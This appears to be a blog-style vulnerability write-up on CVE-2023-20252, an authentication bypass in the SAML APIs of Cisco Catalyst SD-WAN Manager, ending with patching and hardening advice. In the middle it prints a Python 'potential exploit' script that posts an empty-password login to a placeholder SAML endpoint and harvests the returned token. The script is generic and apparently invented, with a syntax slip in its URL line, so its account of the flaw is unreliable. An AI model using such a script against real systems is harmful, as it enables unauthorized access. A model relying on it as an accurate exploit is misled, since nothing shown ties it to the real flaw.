CVE-2023-20252 - Unauthorized Access Vulnerability in Cisco Catalyst SD-WAN Manager Software SAML APIs

Do you use Cisco Catalyst SD-WAN Manager Software in your network environment? If yes, then you should pay close attention to this post because a recently discovered vulnerability could put your system and sensitive data at risk.

A vulnerability known under the CVE-2023-20252 identifier has been discovered in the Security Assertion Markup Language (SAML) APIs of Cisco Catalyst SD-WAN Manager Software. The vulnerability allows an unauthenticated, remote attacker to gain unauthorized access to the application, putting the integrity and security of your data at risk.

The Vulnerability

This vulnerability is due to improper authentication checks for SAML APIs in Cisco Catalyst SD-WAN Manager Software. SAML is used widely for enabling secure access to websites and applications, helping to ensure that only authorized users can gain access to sensitive data.

In simple terms, Cisco Catalyst SD-WAN Manager Software's implementation of SAML APIs inadvertently allows attackers to bypass the authentication process by sending requests directly to the SAML API.

This issue poses a significant threat as an attacker could exploit this vulnerability and gain unauthorized access to your Catalyst SD-WAN Manager Software as an arbitrary user, potentially obtaining sensitive data or modifying network configurations.

Here's a snippet of a potential exploit code

import requests

# SAML API endpoint for the vulnerable software
TARGET_API_URL = "https://your-vulnerable-sd-wan-manager.com/saml/api/";

# Arbitrary username to access the software as
USERNAME = "attacker"

# Crafted request for getting unauthorized access token
payload = {
    "username": USERNAME,
    "password": "",  # Empty password
}
headers = {"Content-Type": "application/json"}

response = requests.post(TARGET_API_URL, json=payload, headers=headers)
auth_token = response.json().get("authorization")

if auth_token and response.status_code == 200:
    print(f"Successfully obtained unauthorized access as {USERNAME}.")
    print("Auth Token:", auth_token)
else:
    print("Failed to exploit the vulnerability.")

In the exploit code above, an attacker sends a request directly to the SAML API, leveraging the improper authentication check to generate an unauthorized access token. Once acquired, the access token allows the attacker to gain access to the Cisco Catalyst SD-WAN Manager Software as an arbitrary user.

This vulnerability's details can be verified and checked on Cisco's official advisory page

* Cisco Security Advisory - CVE-2023-20252

We would like to thank the security researcher who discovered and reported this vulnerability - their responsible disclosure helps the community to stay safe and protected.

Stay Protected

To protect yourself from this vulnerability, make sure to apply the relevant security patches and updates provided by Cisco, or consider migrating to a newer version of the Cisco Catalyst SD-WAN Manager Software that is not affected by the CVE-2023-20252 issue.

Additionally, it's essential to always follow security best practices, such as implementing strong authentication mechanisms, enabling multi-factor authentication (MFA), and regularly monitoring and auditing your network configurations.

Stay vigilant and safeguard your digital assets against cybersecurity threats.

Timeline

Published on: 09/27/2023 18:15:00 UTC
Last modified on: 10/16/2023 16:35:00 UTC